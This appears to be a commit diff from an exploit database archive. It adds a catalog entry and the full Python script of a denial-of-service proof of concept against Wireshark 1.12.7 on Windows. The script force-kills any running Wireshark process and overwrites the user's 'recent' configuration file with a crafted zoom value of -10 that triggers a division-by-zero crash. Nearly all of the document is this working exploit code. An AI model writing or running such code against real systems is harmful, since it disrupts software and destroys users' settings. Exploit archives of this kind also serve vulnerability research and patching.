DB: 2015-09-20

1 new exploits

files.csv

@@ -34533,4 +34533,5 @@ id,file,description,date,author,platform,type,port
 38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross Site Scripting Vulnerability",2013-01-23,"High-Tech Bridge SA",php,webapps,0
 38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0
 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
+38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80

platforms/windows/dos/38240.py

@@ -0,0 +1,137 @@
+# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
+# Date: 02/09/2015
+# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
+# Vendor Homepage: https://www.wireshark.org/
+# Software Link: https://www.wireshark.org/download.html
+# Version: 1.12.7 
+# Tested on: Windows 7
+# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
+
+import os
+import subprocess
+import getpass
+
+drive=os.getenv("systemdrive")
+user=getpass.getuser()
+path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
+ 
+def wiresharkIsPresent():
+ 
+ ps=subprocess.check_output("tasklist")
+ 
+ if "Wireshark.exe" in ps:
+ 
+  return 1
+ 
+ else:
+ 
+  return 0
+ 
+ 
+ 
+def killWireshark():
+ 
+ try:
+ 
+  res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
+ 
+  return 1
+ 
+ except:
+ 
+  return 0
+ 
+ 
+ 
+if wiresharkIsPresent():
+ 
+ if killWireshark():
+ 
+  print "Wireshark is killed!"
+ 
+sploit="""
+# Recent settings file for Wireshark 1.12.7.
+#
+# This file is regenerated each time Wireshark is quit
+# and when changing configuration profile.
+# So be careful, if you want to make manual changes here.
+ 
+ 
+# Main Toolbar show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.toolbar_main_show: TRUE
+ 
+# Filter Toolbar show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.filter_toolbar_show: TRUE
+ 
+# Wireless Settings Toolbar show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.wireless_toolbar_show: FALSE
+ 
+# Show (hide) old AirPcap driver warning dialog box.
+# TRUE or FALSE (case-insensitive).
+gui.airpcap_driver_check_show: TRUE
+ 
+# Packet list show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.packet_list_show: TRUE
+ 
+# Tree view show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.tree_view_show: TRUE
+ 
+# Byte view show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.byte_view_show: TRUE
+ 
+# Statusbar show (hide).
+# TRUE or FALSE (case-insensitive).
+gui.statusbar_show: TRUE
+ 
+# Packet list colorize (hide).
+# TRUE or FALSE (case-insensitive).
+gui.packet_list_colorize: TRUE
+ 
+# Timestamp display format.
+# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
+gui.time_format: RELATIVE
+ 
+# Timestamp display precision.
+# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
+gui.time_precision: AUTO
+ 
+# Seconds display format.
+# One of: SECONDS, HOUR_MIN_SEC
+gui.seconds_format: SECONDS
+ 
+# Zoom level.
+# A decimal number.
+gui.zoom_level: -10
+ 
+# Bytes view.
+# A decimal number.
+gui.bytes_view: 0
+ 
+# Main window upper (or leftmost) pane size.
+# Decimal number.
+gui.geometry_main_upper_pane: 440
+ 
+# Main window middle pane size.
+# Decimal number.
+gui.geometry_main_lower_pane: 428
+ 
+# Packet list column pixel widths.
+# Each pair of strings consists of a column format and its pixel width.
+column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
+ 
+ # Last directory navigated to in File Open dialog.
+gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
+"""
+try:
+	f=open(path,"w")
+	f.write(sploit)
+	f.close()
+	print "Success!"
+except:
+	print "Fail :("